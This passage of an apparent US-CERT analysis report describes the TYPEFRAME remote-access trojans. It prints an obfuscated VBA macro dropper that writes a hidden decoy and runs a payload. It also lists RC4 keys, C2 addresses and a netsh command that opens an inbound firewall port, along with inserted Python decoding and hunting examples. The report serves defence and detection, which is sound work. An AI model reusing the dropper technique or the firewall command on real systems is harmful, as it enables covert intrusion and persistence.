\"securitywarning_lmcirt_403.doc\"\r\n   liveOn = \"tfdvsjuzxbsojoh`mndjsu`514/epd\"\r\n   liveOffd = Environ(\"temp\") + \"\\\"\r\n   For qnx = 1 To Len(liveOn)\r\n       liveOffd = liveOffd + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)\r\n   Next qnx\r\n   Dim strd(167) As String\r\n   strd(167) = \"\"\r\n   Dim offBind(499) As Byte\r\n   Open liveOffd For Binary Access Write As #2\r\n   lpdq = 1\r\n   For jnx = 0 To 166\r\n       For inx = 0 To 499\r\n           offBind(inx) = Val(\"\u0026H\" + Mid(strd(jnx + 1), inx * 2 + 1, 2))\r\n           offBind(inx) = offBind(inx) Xor 231\r\n       Next inx\r\n       Put #2, lpdq, offBind\r\n       lpdq = lpdq + 500\r\n   Next jnx\r\n      Close #2\r\n      ' 6 = vbHidden + vbSystem: hide the decoy on disk\r\n      SetAttr liveOffd, 6\r\n      bazs = ThisDocument.Name\r\n      Application.Documents.Open (liveOffd)\r\n   Application.ActiveDocument.ActiveWindow.Caption = bazs\r\n   ThisDocument.Close\r\n   gaqz:\r\nEnd Sub\r\n' Shifts each character back by 20 within the window 46..121, wrapping around\r\nFunction Jdhcuad(Input_Str$) As String\r\n   Dim Len_Str%, Result$, Temp_Str$, n%\r\n   Len_Str = Len(Input_Str)\r\n   For n = 1 To Len_Str\r\n       Temp_Str = Mid(Input_Str, n, 1)\r\n       Temp_Str = Chr(46 + (Asc(Temp_Str) - 46 - 20 + (122 - 46)) Mod (122 - 46))\r\n       Result = Result + Temp_Str\r\n   Next\r\n      Jdhcuad = Result\r\nEnd Function\r\nPrivate Sub jfsukew(filename)\r\n   Dim obj As Object\r\n   ' Jdhcuad(\"kgw:18\u003cBg0y44\") decodes to \"WScript.Shell\"\r\n   Set obj = CreateObject(Jdhcuad(\"kgw:18\u003cBg0y44\"))\r\n   obj.Run filename, 1, False\r\n   Set obj = Nothing\r\nEnd Sub\r\n--End code snippet--\r\nc9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777\r\nTags\r\nbackdoor, remote-access-trojan, trojan\r\nDetails\r\nName BFB41BC0C3856AA0A81A5256B7B8DA51\r\nSize 578174 bytes\r\nType PE32+ executable (GUI) x86-64, for MS Windows\r\nMD5 bfb41bc0c3856aa0a81a5256b7b8da51\r\nSHA1 cb96e29332fe94d1a70309837f73daf7bec81284\r\nSHA256 c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777\r\nSHA512 37223163a329ffa7b77a9190aab1da5fbf38c6d76139591d592d695e5caa81b56f6d3769540e2781c87a29de3d39e5e9c8ee70bd9ed6a0bee\r\nssdeep 12288:jxn1kOPTkEjkHsnCrYHM46QyFgHj+u1XC1GbA/UXAfAGZI3PWM+:jxn1kOLkEQHsYYDdD+u1HbA/Uw47/L+\r\nEntropy 7.848313\r\nAntivirus\r\nAhnlab Trojan/Win32.Akdoor\r\nAvira TR/NukeSped.qkzfp\r\nBitDefender 
Trojan.GenericKD.31025967\r\nClamAV Win.Trojan.Typeframe-6595036-1\r\nCyren W64/Trojan.ZNJL-0100\r\nESET a variant of Win64/NukeSped.BA trojan\r\nEmsisoft Trojan.GenericKD.31025967 (B)\r\nIkarus Trojan.Win64.Nukesped\r\nK7 Riskware ( 0040eff71 )\r\nNANOAV Trojan.Win64.NukeSped.feqzml\r\nSophos Troj/NukeSped-T\r\nSymantec Trojan Horse\r\nTACHYON Trojan/W32.Agent.578174\r\nTrendMicro BKDR64_.97ED50E7\r\nTrendMicro House Call BKDR64_.97ED50E7\r\nVirusBlokAda Backdoor.Win64.Agent\r\nZillya! Backdoor.Agent.Win64.360\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule enc_PK_header {\r\n    meta:\r\n        author = \"NCCIC trusted 3rd party\"\r\n        incident = \"10135536\"\r\n        date = \"2018-04-12\"\r\n        category = \"hidden_cobra\"\r\n        family = \"TYPEFRAME\"\r\n        hash0 = \"3229a6cea658b1b3ca5ca9ad7b40d8d4\"\r\n    strings:\r\n        $s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 }\r\n        $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a }\r\n        $s2 = { ae 1d af 74 c0 f5 e1 02 50 10 }\r\n    condition:\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them\r\n}\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 {\r\n    meta:\r\n        author = \"NCCIC trusted 3rd party\"\r\n        incident = \"10135536\"\r\n        date = \"2018-04-12\"\r\n        category = \"hidden_cobra\"\r\n        family = \"TYPEFRAME\"\r\n        hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\"\r\n    strings:\r\n        $s0 = { A6 D6 02 EB 4E B2 41 EB C3 EF 1F }\r\n        $s1 = { B6 DF 01 FD 48 B5 }\r\n        $s2 = { B6 D5 0E F3 4E B5 }\r\n        $s3 = { B7 DF 0E EE }\r\n        $s4 = { B6 DF 03 FC }\r\n        $s5 = { A7 D3 03 FC }\r\n    condition:\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-06-05 21:21:48-04:00\r\nImport Hash c1bcec5e2d5d967daefaff0a252273a6\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n55b6d1ed6d76c7d17cc270bc1843d2cb header 1024 2.558659\r\n6e501513865a783fa945269010ac3785 .text 69632 6.390707\r\n45584c7afdc086b651d7299673643506 .rdata 24064 4.704433\r\n4a8e757aef91c54de52d5b81098e0cc7 
.data 7680 4.003255\r\nde3fe99833797faa77379640174d16c4 .pdata 4096 4.786623\r\n0cc425d0556c63acb7c04b9b1a211d5b .rsrc 512 5.105006\r\n914f25782a74f42e42d7974b13bd01c8 .reloc 1536 2.869845\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 8.0 (DLL)\r\nRelationships\r\nc9e3b83d77... Contains e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef\r\nDescription\r\nThis file is a 64-bit Windows executable version of the file\r\n8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8 and is designed to install a RAT as a service on\r\nthe victim’s system. This file accepts the following argument during execution:\r\n\"68S3mI2AMcmOz3BgjnuYpLlZ4fZog7sd\".\r\nThe RAT’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End RC4 key--\r\nDecrypted strings of interest are displayed below:\r\n--Begin strings of interest--\r\nhost.dll\r\n\"Task Notification Service\"\r\n\"Monitors And Notifies Task Scheduling And Interaction\"\r\nnetsvcs\r\n--End strings of interest--\r\nWhen executed, the RAT loads an embedded RC4 encrypted archive starting at file offset 0x1A800 and decrypts it with the same RC4 key. The decrypted archive contains a malicious DLL module, which\r\nis decompressed and written to \"C:\\Windows\\system32\\dwnhost.dll\". The first three characters of the module name are\r\nrandomly generated; the decrypted string \"host.dll\" is the fixed suffix.\r\nThe malware contains RC4 encrypted configuration data (192 bytes). 
During runtime, it writes the encrypted\r\nconfiguration data to the following registry value:\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\dwnhost.dll\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nThe malware registers the malicious DLL module as the ServiceDll of a service in the \"netsvcs\" service group so that\r\n\"C:\\Windows\\system32\\dwnhost.dll\" is loaded by the Windows service host process, \"%SYSTEMROOT%\\system32\\svchost.exe\".\r\nThe service name and the display name are randomly generated.\r\nThe installed service information is displayed below:\r\n--Begin service--\r\nServiceName = \"NWCWorkstation\"\r\nDisplayName = \"NWCWorkstation\"\r\nDesiredAccess = SERVICE_ALL_ACCESS\r\nServiceType = SERVICE_WIN32_SHARE_PROCESS\r\nStartType = SERVICE_AUTO_START\r\nBinaryPathName = \"%SYSTEMROOT%\\system32\\svchost.exe -k netsvcs\"\r\n--End service--\r\ne088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef\r\nTags\r\nremote-access-trojan, trojan\r\nDetails\r\nName dwnhost.dll\r\nSize 1030144 bytes\r\nType PE32+ executable (DLL) (GUI) x86-64, for MS Windows\r\nMD5 9722bc9e0efb4214116066d1ff14094c\r\nSHA1 41a938499048a6ad8034d09e2fbb893da8f13ca9\r\nSHA256 e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef\r\nSHA512 8470c240868441093314ebe263028ceef61d900b41aaeed77fd934edf81b9a75f6c96d0fccc0ac87364c8e23e0b8eb19ec8bcd47daf1d50c11\r\nssdeep 12288:nqU713B5hV7rJIBBAVbyjRbjSbdSYJ3raxt7o6qRBpDwQmnQ2bqPjD+PmCNVGsPf:nRxJIB7hSZSG37jo/GsPepCdOwy\r\nEntropy 6.424883\r\nAntivirus\r\nAhnlab Trojan/Win32.Agent\r\nAntiy Trojan/Win32.AGeneric\r\nBitDefender Trojan.GenericKD.31025935\r\nClamAV Win.Trojan.Typeframe-6595036-1\r\nCyren W64/Trojan.IFZB-3557\r\nESET a variant of Win64/NukeSped.BA trojan\r\nEmsisoft 
Trojan.GenericKD.31025935 (B)\r\nIkarus Trojan.Win64.Nukesped\r\nK7 Riskware ( 0040eff71 )\r\nMcAfee RDN/Generic.dx\r\nNANOAV Trojan.Win64.NukeSped.fepuhl\r\nSophos Troj/NukeSped-U\r\nTrendMicro BKDR64_.512A3DD3\r\nTrendMicro House Call BKDR64_.512A3DD3\r\nZillya! Trojan.Generic.Win32.68467\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 {\r\n    meta:\r\n        author = \"NCCIC trusted 3rd party\"\r\n        incident = \"10135536\"\r\n        date = \"2018-04-12\"\r\n        category = \"hidden_cobra\"\r\n        family = \"TYPEFRAME\"\r\n        hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\"\r\n    strings:\r\n        $s0 = { A6 D6 02 EB 4E B2 41 EB C3 EF 1F }\r\n        $s1 = { B6 DF 01 FD 48 B5 }\r\n        $s2 = { B6 D5 0E F3 4E B5 }\r\n        $s3 = { B7 DF 0E EE }\r\n        $s4 = { B6 DF 03 FC }\r\n        $s5 = { A7 D3 03 FC }\r\n    condition:\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\ne088c3a0b0... Contained_Within c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777\r\nDescription\r\ndwnhost.dll (original name: DLL64.dll) is the 64-bit Windows dynamic-link library (DLL) version of \"laxhost.dll\"\r\n(a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6). 
This RAT module was installed as a service\r\nby the file \"c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777\".\r\nThe RAT’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End RC4 key--\r\nWhen executed, the RAT loads the encrypted configuration data from the registry and decrypts it with the same RC4 key.\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\dwnxhost.dll\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nThe decrypted data contains the command and control IP address and port number, as a little-endian 16-bit port followed by the four IP octets:\r\n--Begin IP and port # list--\r\nBB 01 3B 5A 5D 61 ==\u003e 59.90.93.97:443\r\n--End IP and port # list--\r\nThe malware attempts to connect to its remote server IP 59.90.93.97 on port 443 and waits for instructions.\r\nThe malware is designed to accept instructions from the remote server to perform the following functions:\r\n--Begin functions performed by the malware--\r\nGet disk free space\r\nSearch for files\r\nExecute a process in elevated mode\r\nTerminate processes\r\nDelete files\r\nExecute commands via a shell\r\nDownload and upload files\r\nRead and write files\r\nDelete the service and uninstall malware components using a batch script\r\n--End functions performed by the malware--\r\n20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\nTags\r\nremote-access-trojan, trojan\r\nDetails\r\nName EF9DB20AB0EEBF0B7C55AF4EC0B7BCED\r\nSize 152064 bytes\r\nType PE32+ executable (GUI) x86-64, for MS Windows\r\nMD5 ef9db20ab0eebf0b7c55af4ec0b7bced\r\nSHA1 0202942d11c994cece943bb873f3af156d820f59\r\nSHA256 
20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\nSHA512 85fa80079c59da83e3b2471eab0d2981c92b6c589cbe5052bf438831ae464e6499040ead68d6bc9929edd9f6c08ecc6abf2a0173e31bd361a\r\nssdeep 3072:qocqUTuIzXblpGxqSDBiiBmLEEjdTIf3TIb9Qw/uAZyerrPabYlQ:qJqUnXKxqSAiBJyTC3TIb9QRL0lQ\r\nEntropy 6.269643\r\nAntivirus\r\nAntiy Trojan/Win32.AGeneric\r\nAvira TR/AD.APTLazerus.ciszm\r\nBitDefender Trojan.GenericKD.31020049\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 29 of 40\n\nClamAV Win.Trojan.Typeframe-6595037-1\r\nCyren W64/Trojan.CWPJ-5887\r\nESET a variant of Win64/NukeSped.L trojan\r\nEmsisoft Trojan.GenericKD.31020049 (B)\r\nIkarus Trojan.Win64.Nukesped\r\nK7 Trojan ( 00535d221 )\r\nMcAfee Generic.dvq\r\nMicrosoft Security Essentials Trojan:Win32/Autophyte.A!dha\r\nNANOAV Trojan.Win64.NukeSped.feqzil\r\nSophos Troj/NukeSped-V\r\nSymantec Trojan Horse\r\nTrendMicro BKDR64_.97ED50E7\r\nTrendMicro House Call BKDR64_.97ED50E7\r\nVirusBlokAda Trojan.Autophyte\r\nZillya! Trojan.NukeSped.Win64.21\r\nYara Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2016-09-07 14:28:45-04:00\r\nImport Hash 13c53cfa11bb74ea99fefdf29d78a9f9\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n2082ea5adc4b910e8673c04dc7d962d2 header 1024 2.623906\r\ne6e5ce270a5e80221a815dbf739883a2 .text 111616 6.434048\r\n3a7628ebb18c5e07cf37654fd431de6b .rdata 26112 5.315772\r\n52e12517ca5b2c29e9496bc3032f0d5d .data 5632 2.052338\r\nf9b37a6c76a99538605929f5bef6c2e2 .pdata 5632 5.165417\r\nd5ecc406ee2be45ed510958b0d4f326a .rsrc 512 5.112624\r\n07b2edf2675fa88a86c977fec3ad03cd .reloc 1536 2.826598\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 8.0 (DLL)\r\nRelationships\r\n20abb95114... Connected_To 98.101.211.162\r\n20abb95114... 
Connected_To 81.0.213.173\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 30 of 40\n\nDescription\r\nThis file is a 64-bit Windows executable designed to connect to its remote server and wait for instructions. The malware’s\r\nfile APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\nDA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B\r\n--End RC4 key--\r\nThis file is a variant of a RAT that contains the following embedded hexadecimal-encoded C2 IP address and port number:\r\n--Begin IP and port # list--\r\n1BBh ==\u003e 443\r\n0A2D36562h ==\u003e 98.101.211.162\r\n0ADD50051h ==\u003e 81.0.213.173\r\n--End IP and port # list--\r\nWhen executed, it attempts to connect to its C2 IPs using port 443 and waits for instructions. The malware is designed to\r\naccept instructions from the remote server to perform additional functions.\r\n201c7cd10a2bd50dde0948d14c3c7a0732955c908a3392aee3d08b94470c9d33\r\nTags\r\nproxytrojan\r\nDetails\r\nName 1C53E7269FE9D84C6DF0A25BA59B822C\r\nSize 126976 bytes\r\nType PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nMD5 1c53e7269fe9d84c6df0a25ba59b822c\r\nSHA1 b775d753671133cbc4919764d2fac0d298166b07\r\nSHA256 201c7cd10a2bd50dde0948d14c3c7a0732955c908a3392aee3d08b94470c9d33\r\nSHA512 3d3883b9b29e264d023b7034d980b7c206c9fc82010bf7f5f1dc454fdbd316830fe69e90579406a74afc1fca8e266d10c1b46784bd661dcb2\r\nssdeep 1536:EaMa/KVyD4hv6LLETuA1x+sh2iE1s44tz4qoWYUwnZ7hUOC2:G8YPZ6LLqQFX4tz4quxY\r\nEntropy 6.024087\r\nAntivirus\r\nAhnlab Win-Trojan/Hwdoor.Gen\r\nAntiy Trojan/Win32.AGeneric\r\nAvira TR/AD.APTLazerus.itpsz\r\nBitDefender Gen:Variant.Ursu.239474\r\nClamAV Win.Trojan.Typeframe-6595035-1\r\nCyren W32/Trojan.OYWW-7040\r\nESET a variant of Win32/NukeSped.AK trojan\r\nEmsisoft Gen:Variant.Ursu.239474 (B)\r\nIkarus Trojan.Win32.NukeSped\r\nK7 Trojan ( 0051c2fd1 )\r\nMicrosoft Security Essentials Trojan:Win32/Autophyte.B!dha\r\nNANOAV 
Trojan.Win32.NukeSped.felyfu\r\nSophos Troj/Cruprox-B\r\nSymantec Trojan Horse\r\nTrendMicro TROJ_PROXSPED.A\r\nTrendMicro House Call TROJ_PROXSPED.A\r\nVirusBlokAda Trojan.Autophyte\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule import_deob {\r\n    meta:\r\n        author = \"NCCIC trusted 3rd party\"\r\n        incident = \"10135536\"\r\n        date = \"2018-04-12\"\r\n        category = \"hidden_cobra\"\r\n        family = \"TYPEFRAME\"\r\n        md5 = \"ae769e62fef4a1709c12c9046301aa5d\"\r\n        md5 = \"e48fe20eb1f5a5887f2ac631fed9ed63\"\r\n    strings:\r\n        $ =  { 8a 01 3c 62 7c 0a 3c 79 7f 06 b2 db 2a d0 88 11 8a 41 01 41 84 c0 75 e8 }\r\n        $ = { 8A 08 80 F9 62 7C 0B 80 F9 79 7F 06 82 DB 2A D1 88 10 8A 48 01 40 84 C9 75 E6 }\r\n    condition:\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2015-07-08 22:50:54-04:00\r\nImport Hash 21ccd1b1341683d8831663fc3ed8f86d\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nf066de8df54d4f92795472d981374309 header 4096 0.736742\r\ne321dba33ae4db3b9e29aa6072b92e77 .text 57344 6.464385\r\na256d5f52608331df8545a9d38751462 .rdata 8192 3.628560\r\n1d905ad87919346eb6c8463f61b599e8 .data 16384 1.547483\r\nafdf2120655e37010482a536d552199e .rsrc 32768 7.100033\r\nbbeec3983cc5b2094f8311718d327480 .reloc 8192 3.234713\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 6.0\r\nMicrosoft Visual C++ 6.0 DLL (Debug)\r\nDescription\r\nThis file (original name: Proxy_SVC_DLL.dll) is a proxy module installed as a service. 
The proxy installer that installs this module was not available for analysis.\r\nThis file is designed to open a port in the Windows Firewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy server. The malware’s API names and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\nDA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B\r\n--End RC4 key--\r\nWhen executed, the module attempts to load the encrypted configuration data from the registry and decrypt it with the RC4 key:\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nAnalysis indicates that the decrypted configuration data contains port numbers. The malware uses the following command to add an inbound allow rule to the Windows Firewall for the decrypted port (the rule name \"PortOpenning\" is misspelled in the sample and is a usable hunting string):\r\n--Begin firewall modification--\r\n\"netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=\u003cdecrypted port number\u003e action=allow enable=yes\"\r\n--End firewall modification--\r\nThe malware then listens on the configured port and waits for a connection. The malware contains public SSL certificates in its resource named \"101\". 
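Decoding the indicators given in the two descriptions above, as an added example that is not part of the report: the MASM-style hex immediates in the '--Begin IP and port # list--' block are rendered as the in_addr values they are in memory, the byte loop matched by the first pattern of the import_deob YARA rule is applied to recover import names, and the RC4 key the report gives is used to decrypt string blobs. No ciphertext from the samples is reproduced on this page, so the demo ciphertext is constructed by encrypting a hypothetical string with the report's key; the standard 'Key'/'Plaintext' RC4 test vector shows the cipher routine itself is correct. All function names are the example's own.

```python
import ipaddress
import struct

# --- values copied from the report ---------------------------------------------
RC4_KEY = bytes.fromhex('DAE161FF0C2795871757A4D6EAE3822B')   # '--Begin RC4 key--' block
REPORT_PORT = '1BBh'                                             # '--Begin IP and port # list--'
REPORT_IPS = ['0A2D36562h', '0ADD50051h']


def parse_masm_hex(token):
    '''Turn a MASM-style literal such as '0ADD50051h' (trailing h, leading 0) into an int.'''
    token = token.strip()
    if not token.lower().endswith('h'):
        raise ValueError('not a MASM hex literal: ' + token)
    return int(token[:-1], 16)


def dword_to_ipv4(value):
    '''Render a 32-bit immediate as the in_addr it is in memory. The four octets sit in
    network order, so a little-endian x86/x64 load shows them reversed:
    0xA2D36562 -> bytes 62 65 D3 A2 -> 98.101.211.162.'''
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError('value does not fit in a DWORD')
    return str(ipaddress.IPv4Address(struct.pack('<I', value)))


def decode_c2_list(port_token, ip_tokens):
    '''(port, [dotted quad, ...]) for the immediates exactly as the report prints them.'''
    return parse_masm_hex(port_token), [dword_to_ipv4(parse_masm_hex(t)) for t in ip_tokens]


def deobfuscate_import_name(data):
    '''The loop the YARA rule's first pattern matches: every byte in 'b'..'y' becomes
    0xDB minus the byte (b<->y, c<->x, ...); other bytes pass through. It is an involution.'''
    return bytes(0xDB - b if 0x62 <= b <= 0x79 else b for b in data)


def rc4(key, data):
    '''Plain RC4 (key scheduling + PRGA); encrypt and decrypt are the same operation.'''
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def looks_like_text(blob, threshold=0.95):
    '''Cheap plausibility check for a candidate decryption: mostly printable ASCII.'''
    if not blob:
        return False
    printable = sum(1 for b in blob if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(blob) >= threshold


def decrypt_strings(blobs, key=RC4_KEY):
    '''Decrypt candidate string blobs with the report key, keeping plausible results only.'''
    results = []
    for blob in blobs:
        plain = rc4(key, blob)
        if looks_like_text(plain):
            results.append(plain.decode('ascii', errors='replace'))
    return results


# Constructed demo input: the page reproduces no ciphertext, so a hypothetical encrypted
# string is made here by encrypting the DLL's original name with the report key.
DEMO_CIPHERTEXT = rc4(RC4_KEY, b'Proxy_SVC_DLL.dll')

if __name__ == '__main__':
    port, ips = decode_c2_list(REPORT_PORT, REPORT_IPS)
    print('C2:', ', '.join('%s:%d' % (ip, port) for ip in ips))
    print('deobfuscated import:', deobfuscate_import_name(b'LlawLryiaibA').decode())
    print('decrypted:', decrypt_strings([DEMO_CIPHERTEXT]))
```

Run decrypt_strings over blobs carved from the .data/.rdata sections or over the PrintConfigs\Description registry value; a result that fails looks_like_text means a wrong blob boundary, a wrong key, or a payload that is not a string (the configuration is reported to hold port numbers, so expect small binary values there rather than text).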
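Host-side hunting for the behaviour described above, as an added example that is not part of the report: it flags an inbound allow rule added through netsh (HIGH when the rule name is the sample's misspelled PortOpenning, MEDIUM for any other inbound allow rule), a write to the PrintConfigs\Description registry value, and a connection on 443 to any C2 address listed in the report's Relationship Summary. The events are constructed Sysmon-style dicts (event IDs 1, 13 and 3 with Sysmon's field names); the severity labels and the sample events are the example's own, and a real deployment would read events from the Sysmon log instead of a list.

```python
import shlex

# Indicators taken from the report: the C2 addresses in the Relationship Summary, the port
# they are contacted on, the firewall rule name and the registry value holding the config.
C2_IPS = {'98.101.211.162', '81.0.213.173', '184.107.209.2', '111.207.78.204',
          '80.91.118.45', '181.119.19.56', '59.90.93.97'}
C2_PORT = 443
FIREWALL_RULE_NAME = 'portopenning'     # misspelled exactly as in the sample; compared lower-case
CONFIG_VALUE = r'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs\Description'.lower()


def parse_netsh_rule(command_line):
    '''{option: value} for a "netsh advfirewall firewall add rule ..." command line, or None
    when the command line is something else. Backslashes become slashes before tokenising
    so Windows paths survive shlex, and shlex strips the quotes around values, so
    name="PortOpenning" and name=PortOpenning compare equal.'''
    try:
        argv = shlex.split(command_line.replace('\\', '/'))
    except ValueError:          # unbalanced quotes: not something netsh would have run
        return None
    if len(argv) < 5:
        return None
    exe = argv[0].lower().rsplit('/', 1)[-1]
    if exe not in ('netsh', 'netsh.exe'):
        return None
    if [a.lower() for a in argv[1:5]] != ['advfirewall', 'firewall', 'add', 'rule']:
        return None
    opts = {}
    for tok in argv[5:]:
        if '=' in tok:
            key, value = tok.split('=', 1)
            opts[key.lower()] = value.lower()
    return opts


def finding_for(event):
    '''Map one Sysmon-style event (a dict with Sysmon field names) to a finding, or None.'''
    eid = event.get('EventID')
    if eid == 1:                                   # process creation
        opts = parse_netsh_rule(event.get('CommandLine', ''))
        if opts and opts.get('dir') == 'in' and opts.get('action') == 'allow':
            name = opts.get('name', '')
            severity = 'HIGH' if name == FIREWALL_RULE_NAME else 'MEDIUM'
            return '%s: inbound allow rule %r on localport %s' % (severity, name, opts.get('localport', 'any'))
    elif eid == 13:                                # registry value set
        if event.get('TargetObject', '').lower() == CONFIG_VALUE:
            return 'HIGH: RC4 config written to ' + event['TargetObject']
    elif eid == 3:                                 # network connection
        if event.get('DestinationIp') in C2_IPS and int(event.get('DestinationPort', 0)) == C2_PORT:
            return 'HIGH: connection to TYPEFRAME C2 %s:%d' % (event['DestinationIp'], C2_PORT)
    return None


def hunt(events):
    '''Run every event through finding_for and keep the hits, in event order.'''
    return [f for f in (finding_for(e) for e in events) if f]


# Constructed sample events (not from the report): three true positives plus a benign
# outbound firewall rule and a benign HTTPS connection.
SAMPLE_EVENTS = [
    {'EventID': 1, 'CommandLine': 'netsh.exe advfirewall firewall add rule name="PortOpenning" '
                                  'dir=in protocol=tcp localport=8443 action=allow enable=yes'},
    {'EventID': 1, 'CommandLine': r'C:\Windows\System32\netsh.exe advfirewall firewall add rule '
                                  r'name="Backup Agent" dir=out action=allow program=C:\backup\agent.exe'},
    {'EventID': 13, 'TargetObject': r'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs\Description'},
    {'EventID': 3, 'DestinationIp': '81.0.213.173', 'DestinationPort': 443},
    {'EventID': 3, 'DestinationIp': '93.184.216.34', 'DestinationPort': 443},
]

if __name__ == '__main__':
    for line in hunt(SAMPLE_EVENTS):
        print(line)
```

Inbound allow rules are routine in administration, so the MEDIUM finding is a triage hint rather than an alert on its own: correlate it with the parent process and with a service installation, since the proxy module runs as a service. The registry and C2 checks are exact-match and should fire rarely enough to page on.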
The embedded certificates are used to generate crafted TLS sessions (a fake-TLS communication mechanism): the port 443 traffic looks like TLS on the wire without being a real TLS session.\r\n98.101.211.162\r\nPorts\r\n443 TCP\r\nWhois\r\nNetRange:       98.100.0.0 - 98.103.255.255\r\nCIDR:           98.100.0.0/14\r\nNetName:        RCMS\r\nNetHandle:      NET-98-100-0-0-1\r\nParent:         NET98 (NET-98-0-0-0-0)\r\nNetType:        Direct Allocation\r\nOriginAS:\r\nOrganization:   Time Warner Cable Internet LLC (RCMS)\r\nRegDate:        2008-03-17\r\nUpdated:        2009-05-05\r\nRef:            https://whois.arin.net/rest/net/NET-98-100-0-0-1\r\nOrgName:        Time Warner Cable Internet LLC\r\nOrgId:          RCMS\r\nAddress:        6399 S Fiddlers Green Circle\r\nCity:           Greenwood Village\r\nStateProv:      CO\r\nPostalCode:     80111\r\nCountry:        US\r\nRegDate:        2001-09-25\r\nUpdated:        2018-03-07\r\nComment:        Allocations for this OrgID serve Road Runner commercial customers out of the Columbus, OH, Herndon, VA and Raleigh, NC RDCs.\r\nRef:            https://whois.arin.net/rest/org/RCMS\r\nRelationships\r\n98.101.211.162 Connected_From 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\n81.0.213.173\r\nPorts\r\n443 TCP\r\nWhois\r\ninetnum:        81.0.213.168 - 81.0.213.175\r\nnetname:        CmsConsulting-CZ\r\ndescr:          CMS Consulting s.r.o.\r\ncountry:        CZ\r\nadmin-c:        CASA3-RIPE\r\ntech-c:         CASA3-RIPE\r\nstatus:         ASSIGNED PA\r\nmnt-by:         CASABLANCA-RIPE-MNT\r\ncreated:        2009-10-09T07:31:35Z\r\nlast-modified:  2009-10-09T07:31:35Z\r\nsource:         RIPE\r\nrole:           Casablanca INT RIPE manager\r\naddress:        Casablanca INT\r\naddress:        Vinohradska 184, Prague 3 - 130 52\r\naddress:        